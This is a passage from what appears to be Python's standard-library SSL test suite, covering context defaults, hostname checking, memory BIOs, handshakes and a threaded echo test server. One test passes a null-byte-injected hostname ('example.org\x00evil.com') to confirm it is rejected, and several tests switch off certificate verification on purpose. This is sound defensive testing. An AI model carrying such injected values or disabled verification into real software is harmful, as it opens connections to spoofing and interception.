ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
@unittest.skipUnless(IS_OPENSSL_1_1_1, "Test requires OpenSSL 1.1.1")
def test_num_tickets(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
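# --- Illustrative sketch (not part of the test suite) -----------------------
# The SSLContext APIs exercised above are the same ones applications use.
# _example_client_context() below is a hedged, minimal sketch of a typical
# client-side setup; the "my_ca.pem" file name is hypothetical and only for
# illustration.
def _example_client_context(cafile="my_ca.pem"):
    # create_default_context() yields CERT_REQUIRED plus hostname checking.
    ctx = ssl.create_default_context()
    # Extra trust anchors can come from a file, a directory (capath=...),
    # or from memory via cadata=... (PEM text or DER bytes), as tested above.
    ctx.load_verify_locations(cafile=cafile)
    return ctx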
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
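# --- Illustrative sketch (not part of the test suite) -----------------------
# test_unwrap() above drives two wrap_bio() objects by hand.  The general
# pattern is a small "pump": attempt a handshake step on each side, then copy
# whatever landed in an outgoing BIO into the peer's incoming BIO.  A minimal
# sketch of that pump, assuming client/server are SSLObjects wired to the four
# MemoryBIOs exactly as in the test above:
def _example_handshake_pump(client, server, c_in, c_out, s_in, s_out, rounds=5):
    for _ in range(rounds):
        for obj in (client, server):
            try:
                obj.do_handshake()
            except ssl.SSLWantReadError:
                pass  # expected until the peer's next flight arrives
        if c_out.pending:
            s_in.write(c_out.read())
        if s_out.pending:
            c_in.write(s_out.read())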
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args); depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. when both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows, test_pha_required_nocert sometimes receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received, test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed.
if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
